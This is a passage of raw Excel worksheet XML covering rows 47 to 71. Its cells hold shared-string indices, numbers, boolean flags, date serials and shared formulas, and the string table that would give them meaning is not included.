      <c r="S47" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="1">
        <v>365.0</v>
      </c>
      <c r="B48" s="2" t="s">
        <v>286</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D48" s="2" t="s">
        <v>287</v>
      </c>
      <c r="E48" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F48" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G48" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="1" t="s">
        <v>288</v>
      </c>
      <c r="I48" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J48" s="1" t="s">
        <v>274</v>
      </c>
      <c r="K48" s="2" t="s">
        <v>275</v>
      </c>
      <c r="L48" s="1">
        <v>5.0</v>
      </c>
      <c r="M48" s="1">
        <v>9.0</v>
      </c>
      <c r="N48" s="1" t="s">
        <v>289</v>
      </c>
      <c r="O48" s="1" t="s">
        <v>277</v>
      </c>
      <c r="P48" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q48" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R48" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S48" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="1">
        <v>366.0</v>
      </c>
      <c r="B49" s="2" t="s">
        <v>290</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D49" s="2" t="s">
        <v>291</v>
      </c>
      <c r="E49" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F49" s="1" t="s">
        <v>292</v>
      </c>
      <c r="G49" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H49" s="4">
        <v>44353.584027777775</v>
      </c>
      <c r="I49" s="1" t="s">
        <v>293</v>
      </c>
      <c r="J49" s="1" t="s">
        <v>294</v>
      </c>
      <c r="K49" s="2" t="s">
        <v>295</v>
      </c>
      <c r="L49" s="1">
        <v>12.0</v>
      </c>
      <c r="M49" s="1">
        <v>20.0</v>
      </c>
      <c r="N49" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O49" s="1" t="s">
        <v>296</v>
      </c>
      <c r="P49" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q49" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R49" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S49" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="1">
        <v>403.0</v>
      </c>
      <c r="B50" s="2" t="s">
        <v>297</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D50" s="2" t="s">
        <v>298</v>
      </c>
      <c r="E50" s="2" t="s">
        <v>299</v>
      </c>
      <c r="F50" s="1" t="s">
        <v>300</v>
      </c>
      <c r="G50" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H50" s="1" t="s">
        <v>301</v>
      </c>
      <c r="I50" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J50" s="1" t="s">
        <v>302</v>
      </c>
      <c r="K50" s="2" t="s">
        <v>303</v>
      </c>
      <c r="L50" s="1">
        <v>1.0</v>
      </c>
      <c r="M50" s="1">
        <v>1.0</v>
      </c>
      <c r="N50" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O50" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P50" s="1" t="s">
        <v>304</v>
      </c>
      <c r="Q50" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R50" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S50" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="1">
        <v>407.0</v>
      </c>
      <c r="B51" s="2" t="s">
        <v>305</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D51" s="2" t="s">
        <v>306</v>
      </c>
      <c r="E51" s="2" t="s">
        <v>89</v>
      </c>
      <c r="F51" s="1" t="s">
        <v>307</v>
      </c>
      <c r="G51" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H51" s="5">
        <v>44177.11736111111</v>
      </c>
      <c r="I51" s="1" t="s">
        <v>293</v>
      </c>
      <c r="J51" s="1" t="s">
        <v>308</v>
      </c>
      <c r="K51" s="2" t="s">
        <v>309</v>
      </c>
      <c r="L51" s="1">
        <v>8.0</v>
      </c>
      <c r="M51" s="1">
        <v>9.0</v>
      </c>
      <c r="N51" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O51" s="1" t="s">
        <v>310</v>
      </c>
      <c r="P51" s="1" t="s">
        <v>311</v>
      </c>
      <c r="Q51" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R51" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S51" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="1">
        <v>408.0</v>
      </c>
      <c r="B52" s="2" t="s">
        <v>312</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D52" s="2" t="s">
        <v>313</v>
      </c>
      <c r="E52" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F52" s="1" t="s">
        <v>314</v>
      </c>
      <c r="G52" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H52" s="5">
        <v>44177.146527777775</v>
      </c>
      <c r="I52" s="1" t="s">
        <v>293</v>
      </c>
      <c r="J52" s="1" t="s">
        <v>308</v>
      </c>
      <c r="K52" s="2" t="s">
        <v>309</v>
      </c>
      <c r="L52" s="1">
        <v>8.0</v>
      </c>
      <c r="M52" s="1">
        <v>9.0</v>
      </c>
      <c r="N52" s="1" t="s">
        <v>315</v>
      </c>
      <c r="O52" s="1" t="s">
        <v>310</v>
      </c>
      <c r="P52" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q52" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R52" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S52" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="1">
        <v>409.0</v>
      </c>
      <c r="B53" s="2" t="s">
        <v>316</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D53" s="2" t="s">
        <v>313</v>
      </c>
      <c r="E53" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F53" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G53" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H53" s="5">
        <v>44177.15</v>
      </c>
      <c r="I53" s="1" t="s">
        <v>293</v>
      </c>
      <c r="J53" s="1" t="s">
        <v>308</v>
      </c>
      <c r="K53" s="2" t="s">
        <v>309</v>
      </c>
      <c r="L53" s="1">
        <v>8.0</v>
      </c>
      <c r="M53" s="1">
        <v>9.0</v>
      </c>
      <c r="N53" s="1" t="s">
        <v>317</v>
      </c>
      <c r="O53" s="1" t="s">
        <v>310</v>
      </c>
      <c r="P53" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q53" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R53" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S53" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="1">
        <v>441.0</v>
      </c>
      <c r="B54" s="2" t="s">
        <v>318</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D54" s="2" t="s">
        <v>319</v>
      </c>
      <c r="E54" s="2" t="s">
        <v>320</v>
      </c>
      <c r="F54" s="1" t="s">
        <v>321</v>
      </c>
      <c r="G54" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H54" s="1" t="s">
        <v>322</v>
      </c>
      <c r="I54" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J54" s="1" t="s">
        <v>323</v>
      </c>
      <c r="K54" s="2" t="s">
        <v>324</v>
      </c>
      <c r="L54" s="1">
        <v>2.0</v>
      </c>
      <c r="M54" s="1">
        <v>4.0</v>
      </c>
      <c r="N54" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O54" s="1" t="s">
        <v>325</v>
      </c>
      <c r="P54" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q54" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R54" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S54" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="1">
        <v>442.0</v>
      </c>
      <c r="B55" s="2" t="s">
        <v>326</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D55" s="2" t="s">
        <v>327</v>
      </c>
      <c r="E55" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F55" s="1" t="s">
        <v>328</v>
      </c>
      <c r="G55" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H55" s="1" t="s">
        <v>329</v>
      </c>
      <c r="I55" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J55" s="1" t="s">
        <v>323</v>
      </c>
      <c r="K55" s="2" t="s">
        <v>324</v>
      </c>
      <c r="L55" s="1">
        <v>2.0</v>
      </c>
      <c r="M55" s="1">
        <v>4.0</v>
      </c>
      <c r="N55" s="1" t="s">
        <v>330</v>
      </c>
      <c r="O55" s="1" t="s">
        <v>325</v>
      </c>
      <c r="P55" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q55" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R55" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S55" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="1">
        <v>443.0</v>
      </c>
      <c r="B56" s="2" t="s">
        <v>331</v>
      </c>
      <c r="C56" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D56" s="2" t="s">
        <v>332</v>
      </c>
      <c r="E56" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F56" s="1" t="s">
        <v>321</v>
      </c>
      <c r="G56" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="1" t="s">
        <v>333</v>
      </c>
      <c r="I56" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J56" s="1" t="s">
        <v>323</v>
      </c>
      <c r="K56" s="2" t="s">
        <v>324</v>
      </c>
      <c r="L56" s="1">
        <v>2.0</v>
      </c>
      <c r="M56" s="1">
        <v>4.0</v>
      </c>
      <c r="N56" s="1" t="s">
        <v>334</v>
      </c>
      <c r="O56" s="1" t="s">
        <v>325</v>
      </c>
      <c r="P56" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q56" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R56" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S56" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="1">
        <v>444.0</v>
      </c>
      <c r="B57" s="2" t="s">
        <v>335</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D57" s="2" t="s">
        <v>336</v>
      </c>
      <c r="E57" s="6" t="s">
        <v>42</v>
      </c>
      <c r="F57" s="1" t="s">
        <v>328</v>
      </c>
      <c r="G57" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="1" t="s">
        <v>337</v>
      </c>
      <c r="I57" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J57" s="1" t="s">
        <v>323</v>
      </c>
      <c r="K57" s="2" t="s">
        <v>324</v>
      </c>
      <c r="L57" s="1">
        <v>2.0</v>
      </c>
      <c r="M57" s="1">
        <v>4.0</v>
      </c>
      <c r="N57" s="1" t="s">
        <v>338</v>
      </c>
      <c r="O57" s="1" t="s">
        <v>325</v>
      </c>
      <c r="P57" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q57" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R57" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S57" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="1">
        <v>445.0</v>
      </c>
      <c r="B58" s="2" t="s">
        <v>339</v>
      </c>
      <c r="C58" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D58" s="2" t="s">
        <v>340</v>
      </c>
      <c r="E58" s="6" t="s">
        <v>22</v>
      </c>
      <c r="F58" s="1" t="s">
        <v>341</v>
      </c>
      <c r="G58" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H58" s="1" t="s">
        <v>342</v>
      </c>
      <c r="I58" s="1" t="s">
        <v>343</v>
      </c>
      <c r="J58" s="1" t="s">
        <v>344</v>
      </c>
      <c r="K58" s="2" t="s">
        <v>345</v>
      </c>
      <c r="L58" s="1">
        <v>2.0</v>
      </c>
      <c r="M58" s="1">
        <v>2.0</v>
      </c>
      <c r="N58" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O58" s="1" t="s">
        <v>346</v>
      </c>
      <c r="P58" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q58" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R58" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S58" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="1">
        <v>446.0</v>
      </c>
      <c r="B59" s="2" t="s">
        <v>347</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D59" s="6" t="s">
        <v>340</v>
      </c>
      <c r="E59" s="6" t="s">
        <v>22</v>
      </c>
      <c r="F59" s="1" t="s">
        <v>348</v>
      </c>
      <c r="G59" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H59" s="1" t="s">
        <v>349</v>
      </c>
      <c r="I59" s="1" t="s">
        <v>343</v>
      </c>
      <c r="J59" s="1" t="s">
        <v>344</v>
      </c>
      <c r="K59" s="2" t="s">
        <v>345</v>
      </c>
      <c r="L59" s="1">
        <v>2.0</v>
      </c>
      <c r="M59" s="1">
        <v>2.0</v>
      </c>
      <c r="N59" s="1" t="s">
        <v>346</v>
      </c>
      <c r="O59" s="1" t="s">
        <v>346</v>
      </c>
      <c r="P59" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q59" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R59" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S59" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="1">
        <v>449.0</v>
      </c>
      <c r="B60" s="2" t="s">
        <v>350</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D60" s="2" t="s">
        <v>351</v>
      </c>
      <c r="E60" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F60" s="1" t="s">
        <v>352</v>
      </c>
      <c r="G60" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H60" s="4">
        <v>44778.595138888886</v>
      </c>
      <c r="I60" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J60" s="1" t="s">
        <v>353</v>
      </c>
      <c r="K60" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L60" s="1">
        <v>5.0</v>
      </c>
      <c r="M60" s="1">
        <v>5.0</v>
      </c>
      <c r="N60" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O60" s="1" t="s">
        <v>355</v>
      </c>
      <c r="P60" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q60" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R60" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S60" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="1">
        <v>450.0</v>
      </c>
      <c r="B61" s="2" t="s">
        <v>350</v>
      </c>
      <c r="C61" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D61" s="2" t="s">
        <v>351</v>
      </c>
      <c r="E61" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F61" s="1" t="s">
        <v>352</v>
      </c>
      <c r="G61" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H61" s="4">
        <v>44778.597916666666</v>
      </c>
      <c r="I61" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J61" s="1" t="s">
        <v>356</v>
      </c>
      <c r="K61" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L61" s="1">
        <v>1.0</v>
      </c>
      <c r="M61" s="1">
        <v>1.0</v>
      </c>
      <c r="N61" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O61" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P61" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q61" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R61" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S61" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="1">
        <v>451.0</v>
      </c>
      <c r="B62" s="2" t="s">
        <v>357</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D62" s="2" t="s">
        <v>358</v>
      </c>
      <c r="E62" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F62" s="1" t="s">
        <v>359</v>
      </c>
      <c r="G62" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H62" s="4">
        <v>44778.60625</v>
      </c>
      <c r="I62" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J62" s="1" t="s">
        <v>353</v>
      </c>
      <c r="K62" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L62" s="1">
        <v>5.0</v>
      </c>
      <c r="M62" s="1">
        <v>5.0</v>
      </c>
      <c r="N62" s="1" t="s">
        <v>360</v>
      </c>
      <c r="O62" s="1" t="s">
        <v>355</v>
      </c>
      <c r="P62" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q62" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R62" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S62" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="1">
        <v>452.0</v>
      </c>
      <c r="B63" s="2" t="s">
        <v>350</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D63" s="2" t="s">
        <v>351</v>
      </c>
      <c r="E63" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F63" s="1" t="s">
        <v>352</v>
      </c>
      <c r="G63" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H63" s="4">
        <v>44778.606944444444</v>
      </c>
      <c r="I63" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J63" s="1" t="s">
        <v>362</v>
      </c>
      <c r="K63" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L63" s="1">
        <v>3.0</v>
      </c>
      <c r="M63" s="1">
        <v>5.0</v>
      </c>
      <c r="N63" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O63" s="1" t="s">
        <v>363</v>
      </c>
      <c r="P63" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q63" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R63" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S63" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="1">
        <v>453.0</v>
      </c>
      <c r="B64" s="2" t="s">
        <v>364</v>
      </c>
      <c r="C64" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D64" s="2" t="s">
        <v>358</v>
      </c>
      <c r="E64" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F64" s="1" t="s">
        <v>365</v>
      </c>
      <c r="G64" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H64" s="4">
        <v>44778.666666666664</v>
      </c>
      <c r="I64" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J64" s="1" t="s">
        <v>353</v>
      </c>
      <c r="K64" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L64" s="1">
        <v>5.0</v>
      </c>
      <c r="M64" s="1">
        <v>5.0</v>
      </c>
      <c r="N64" s="1" t="s">
        <v>366</v>
      </c>
      <c r="O64" s="1" t="s">
        <v>355</v>
      </c>
      <c r="P64" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q64" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R64" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S64" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="1">
        <v>454.0</v>
      </c>
      <c r="B65" s="2" t="s">
        <v>367</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D65" s="2" t="s">
        <v>358</v>
      </c>
      <c r="E65" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F65" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G65" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H65" s="4">
        <v>44778.78888888889</v>
      </c>
      <c r="I65" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J65" s="1" t="s">
        <v>353</v>
      </c>
      <c r="K65" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L65" s="1">
        <v>5.0</v>
      </c>
      <c r="M65" s="1">
        <v>5.0</v>
      </c>
      <c r="N65" s="1" t="s">
        <v>368</v>
      </c>
      <c r="O65" s="1" t="s">
        <v>355</v>
      </c>
      <c r="P65" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q65" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R65" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S65" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="1">
        <v>455.0</v>
      </c>
      <c r="B66" s="2" t="s">
        <v>370</v>
      </c>
      <c r="C66" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D66" s="2" t="s">
        <v>358</v>
      </c>
      <c r="E66" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F66" s="1" t="s">
        <v>371</v>
      </c>
      <c r="G66" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H66" s="4">
        <v>44778.82013888889</v>
      </c>
      <c r="I66" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J66" s="1" t="s">
        <v>362</v>
      </c>
      <c r="K66" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L66" s="1">
        <v>3.0</v>
      </c>
      <c r="M66" s="1">
        <v>5.0</v>
      </c>
      <c r="N66" s="1" t="s">
        <v>372</v>
      </c>
      <c r="O66" s="1" t="s">
        <v>363</v>
      </c>
      <c r="P66" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q66" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R66" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S66" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="1">
        <v>456.0</v>
      </c>
      <c r="B67" s="2" t="s">
        <v>373</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D67" s="2" t="s">
        <v>358</v>
      </c>
      <c r="E67" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F67" s="1" t="s">
        <v>374</v>
      </c>
      <c r="G67" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H67" s="4">
        <v>44778.845138888886</v>
      </c>
      <c r="I67" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J67" s="1" t="s">
        <v>353</v>
      </c>
      <c r="K67" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L67" s="1">
        <v>5.0</v>
      </c>
      <c r="M67" s="1">
        <v>5.0</v>
      </c>
      <c r="N67" s="1" t="s">
        <v>375</v>
      </c>
      <c r="O67" s="1" t="s">
        <v>355</v>
      </c>
      <c r="P67" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q67" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R67" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S67" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="1">
        <v>457.0</v>
      </c>
      <c r="B68" s="2" t="s">
        <v>376</v>
      </c>
      <c r="C68" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D68" s="2" t="s">
        <v>377</v>
      </c>
      <c r="E68" s="6" t="s">
        <v>60</v>
      </c>
      <c r="F68" s="1" t="s">
        <v>352</v>
      </c>
      <c r="G68" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H68" s="4">
        <v>44809.129166666666</v>
      </c>
      <c r="I68" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J68" s="1" t="s">
        <v>362</v>
      </c>
      <c r="K68" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L68" s="1">
        <v>3.0</v>
      </c>
      <c r="M68" s="1">
        <v>5.0</v>
      </c>
      <c r="N68" s="1" t="s">
        <v>378</v>
      </c>
      <c r="O68" s="1" t="s">
        <v>363</v>
      </c>
      <c r="P68" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q68" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R68" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S68" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="1">
        <v>458.0</v>
      </c>
      <c r="B69" s="2" t="s">
        <v>379</v>
      </c>
      <c r="C69" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D69" s="2" t="s">
        <v>380</v>
      </c>
      <c r="E69" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F69" s="1" t="s">
        <v>371</v>
      </c>
      <c r="G69" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H69" s="4">
        <v>44809.31875</v>
      </c>
      <c r="I69" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J69" s="1" t="s">
        <v>362</v>
      </c>
      <c r="K69" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L69" s="1">
        <v>3.0</v>
      </c>
      <c r="M69" s="1">
        <v>5.0</v>
      </c>
      <c r="N69" s="1" t="s">
        <v>381</v>
      </c>
      <c r="O69" s="1" t="s">
        <v>363</v>
      </c>
      <c r="P69" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q69" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R69" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S69" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="1">
        <v>459.0</v>
      </c>
      <c r="B70" s="2" t="s">
        <v>382</v>
      </c>
      <c r="C70" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D70" s="2" t="s">
        <v>383</v>
      </c>
      <c r="E70" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F70" s="1" t="s">
        <v>384</v>
      </c>
      <c r="G70" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H70" s="4">
        <v>44809.36388888889</v>
      </c>
      <c r="I70" s="1" t="s">
        <v>361</v>
      </c>
      <c r="J70" s="1" t="s">
        <v>362</v>
      </c>
      <c r="K70" s="2" t="s">
        <v>354</v>
      </c>
      <c r="L70" s="1">
        <v>3.0</v>
      </c>
      <c r="M70" s="1">
        <v>5.0</v>
      </c>
      <c r="N70" s="1" t="s">
        <v>385</v>
      </c>
      <c r="O70" s="1" t="s">
        <v>363</v>
      </c>
      <c r="P70" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q70" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R70" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S70" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="1">
        <v>460.0</v>
      </c>
      <c r="B71" s="2" t="s">
        <v>386</v>
      </c>
      <c r="C71" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D71" s="2" t="s">
        <v>387</v>
      </c>
      <c r="E71" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F71" s="1" t="s">
        <v>388</v>
      </c>
      <c r="G71" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H71" s="1" t="s">
        <v>389</v>
      </c>
      <c r="I71" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J71" s="1" t="s">
        <v>390</v>
      </c>
      <c r="K71" s="2" t="s">
        <v>391</v>
      </c>
      <c r="L71" s="1">
        <v>2.0</v>
      </c>
      <c r="M71" s="1">
        <v>4.0</v>
      </c>
      <c r="N71" s="1" t="s">
        <v>37</v>
      </c>
